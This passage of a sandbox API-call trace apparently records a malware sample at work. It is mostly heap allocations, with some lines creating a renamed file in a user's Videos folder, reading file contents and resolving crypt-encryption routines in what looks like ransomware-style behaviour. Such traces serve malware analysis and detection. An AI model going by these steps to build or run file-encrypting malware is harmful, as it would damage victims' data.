hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.021] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\acj9.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0199.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.025] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0199.030] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x74c0, lpOverlapped=0x0) returned 1 [0199.031] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x174c0) returned 0xbea018 [0199.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0199.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x174c0) returned 0xa5f008 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.035] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x174c0) returned 0xbea018 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.036] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x174c0) returned 0xbea018 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x174c0) returned 0xa764d0 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.039] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.040] PeekMessageW (in: 